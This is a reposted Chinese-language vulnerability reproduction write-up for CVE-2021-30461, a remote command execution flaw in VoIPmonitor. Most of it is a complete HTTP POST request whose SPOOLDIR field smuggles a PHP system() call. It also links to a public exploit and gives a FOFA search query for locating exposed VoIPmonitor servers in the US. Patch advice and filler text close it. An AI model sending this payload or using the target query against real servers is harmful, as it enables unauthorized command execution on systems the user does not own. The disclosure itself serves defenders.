影响范围
VoIPmonitor < 24.60
漏洞类型
远程命令执行
利用条件
影响范围应用
漏洞概述
VoIPmonitor是一款具备商业前端的凯瑞网络数据包嗅探器,近期有安全研究人员披露VoIPmonitor存在远程命令执行漏洞,攻击者可以利用该漏洞获取服务器端的Shell权限并执行系统命令
漏洞复现
登录认证界面:
发送以下请求:
POST /index.php HTTP/1.1
Host: x.x.x.x
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://x.x.x.x
Referer: http://x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=be161dbht8u49u526t6li3tg05
Connection: close
SPOOLDIR=test%22.system%28id%29.%22
EXP测试
之后访问shell:
漏洞EXP
https://github.com/Al1ex/CVE-2021-30461
目标检索
FOFA:
title="VoIPmonitor" && country="US"
安全建议
升级到最新版本~
参考链接
https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
-----------------------------------------------------------------------
凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字
原文始发于微信公众号(七芒星实验室):CVE-2021-30461:VoIPmonitor RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论